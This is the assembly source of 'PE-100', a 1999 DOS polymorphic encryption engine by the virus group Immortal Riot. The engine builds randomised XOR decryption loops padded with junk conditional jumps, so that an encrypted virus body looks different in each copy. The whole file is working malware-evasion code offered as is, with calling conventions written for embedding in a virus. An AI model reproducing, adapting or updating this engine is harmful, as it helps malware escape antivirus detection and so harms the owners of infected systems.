;============================================================================
;
; PE-100 by T-2000 / Immortal Riot.
;
; Written on a cloudy afternoon somewhere in February 1999.
;
; Attempt to write a small but effective polymorphic engine, uses BX/SI/DI/BP
; as a pointer-register and conditional JMPs as junk. Size engine: 125 bytes.
;
;       Call with:                              Returns:
;
;       DS:SI = Code to encrypt.                CX = Size encrypted code.
;       ES:DI = Destination-buffer.
;       CX = Length of code to encrypt.         All registers except BX
;       BP = Delta-offset at runtime.           and SP are destroyed.
;
;============================================================================



                .MODEL  TINY
                .STACK  1024
                .CODE


START:

PE_100:
                PUSH    BX                      ; Save filehandle.
                PUSH    CX                      ; Save amount to copy.

                CALL    Add_Bogus

                MOV     AL, 0B9h                ; MOV CX,
                STOSB

                XCHG    CX, AX                  ; Size of encrypted code.
                STOSW

                CALL    Add_Bogus

Get_Random:     IN      AL, 40h                 ; Get a random value.

                CMP     AL, 4                   ; Must be 0 - 4.
                JA      Get_Random

                CMP     AL, 1                   ; Avoid SP.
                JE      Get_Random

                ADD     AL, (0B8h + 3)          ; MOV Reg16,
                STOSB

                XCHG    BX, AX                  ; Save Ptr_Reg16.

                PUSH    DI

                XCHG    BP, AX                  ; Delta-offset at runtime.
                STOSW

                MOV     CX, DI                  ; Save offset decrypt-loop.

                CALL    Add_Bogus

                MOV     AX, 802Eh               ; XOR BYTE PTR [Ptr_Reg16],
                STOSW

                MOV     AL, [BX.(Ptr_Addr - Start) - (0B8h + 3)]
                STOSB

                CMP     AL, 76h                 ; Ptr_Reg16 is BP ?
                JNE     Get_Encr_Key

                XOR     AL, AL                  ; BP needs displacement.
                STOSB

Get_Encr_Key:   IN      AL, 40h                 ; Get random encryption-key.
                STOSB

                XCHG    BP, AX                  ; Save encryption-key in BP.

                CALL    Add_Bogus

                XCHG    BX, AX

                ADD     AL, (40h + 3) - (0B8h + 3)      ; INC Ptr_Reg16.
                STOSB

                MOV     AX, DI                  ; Displacement between LOOP
                SUB     AX, CX                  ; and Decryption_Loop.

                INC     AX                      ; Convert value since it's
                NOT     AL                      ; a LOOP backwards.

                MOV     AH, AL

                MOV     AL, 0E2h                ; LOOP Decryption_Loop.
                STOSW

                CALL    Add_Bogus

                LEA     CX, [DI-(Buffer-Start)] ; Size of decryptor.

                POP     BX                      ; Delta-offset encrypted.

                ADD     [BX], CX                ; Patch correct code-offset.

Encrypt_Poly:   POP     CX

Encrypt_Byte:   LODSB                           ; Load a byte from source.

                XOR     AX, BP                  ; Encrypt it.

                STOSB                           ; And put it in destination.

                LOOP    Encrypt_Byte            ; Do the whole thing.

                LEA     CX, [DI-(Buffer-Start)] ; Get total size of code.

                POP     BX

; 1/2 chance of adding a bogus conditional JMP.
Add_Bogus:
                IN      AL, 40h                 ; Get a random value.

                OR      AL, AL                  ; Should we add a JMP ?
                JP      Exit_Add_Bogus

                AND     AL, 15                  ; 0 - 15.

                ADD     AL, 70h                 ; Make a random JMP.
                STOSB

                XOR     AL, AL                  ; Zero displacement.
                STOSB

Exit_Add_Bogus: RETN

PE_100_Marker   DB      'PE-100', 0

Ptr_Addr        DB      37h, 00h, 76h, 34h, 35h

Author_Mark     DB      'T2IR', 0

Buffer:
                END     START
